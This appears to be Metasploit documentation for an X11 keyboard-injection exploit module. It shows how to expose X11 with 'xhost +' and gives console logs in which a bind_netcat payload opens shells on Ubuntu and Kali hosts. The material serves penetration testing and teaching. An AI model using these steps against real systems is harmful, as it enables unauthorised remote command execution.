## Vulnerable Application X11 (X Window System) is a graphical windowing system most common on unix/linux. The service can accept connections from any users when misconfigured which is done with the command `xhost +`. This exploit has been verified against: 1. Ubuntu 14.04 2. Ubuntu 16.04 3. Kali via Emulation method This exploit does NOT work against: 1. Solaris 10 Java Desktop System (alt+F2 has no effect) ### Emulation This can be emulated (on kali) utilizing the following command: `socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0` ### Ubuntu 12.04, 14.04 1. `sudo nano /etc/lightdm/lightdm.conf` 2. Under the `[SeatDefaults]` area, add: ``` xserver-allow-tcp=true allow-guest=true ``` 3. logout or reboot 4. Verification: ```sudo netstat -antp | grep 6000``` ``` tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X ``` 5. Now, to verify you allow ANYONE to get on X11, type: `xhost +` ### Ubuntu 16.04 Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*` ## Verification Steps 1. Install and configure X11 2. Start msfconsole 3. Do: `use exploit/unix/x11/x11_keyboard_exec` 4. Do: `set rhost [IPs]` 5. Do: `set payload [payload]` 6. Do: `exploit` ## Scenarios ### Ubuntu 14.04 ``` msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat payload => cmd/unix/bind_netcat msf exploit(x11_keyboard_exec) > run [*] Started bind handler [*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard [*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application" [*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds... [*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm [*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds... [*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload [*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400 id uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) cat /etc/*release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=14.04 DISTRIB_CODENAME=trusty DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS" NAME="Ubuntu" VERSION="14.04.5 LTS, Trusty Tahr" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 14.04.5 LTS" VERSION_ID="14.04" ``` ### Ubuntu 16.04 ``` msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26 rhost => 192.168.2.26 msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat payload => cmd/unix/bind_netcat msf exploit(x11_keyboard_exec) > exploit [*] Started bind handler [*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard [*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application" [*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds... [*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm [*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds... [*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload [*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400 id uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) cat /etc/*release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS" NAME="Ubuntu" VERSION="16.04.1 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.1 LTS" VERSION_ID="16.04" UBUNTU_CODENAME=xenial ``` ### Kali via Emulation ``` msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat payload => cmd/unix/bind_netcat msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1 rhost => 127.0.0.1 msf exploit(x11_keyboard_exec) > run [*] Started bind handler [*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard [*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application" [*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds... [*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm [*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds... [*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload [*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400 ```